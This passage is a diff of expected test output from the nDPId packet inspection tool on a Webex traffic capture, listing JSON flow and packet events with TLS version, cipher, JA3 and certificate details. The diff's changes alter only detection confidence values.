+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 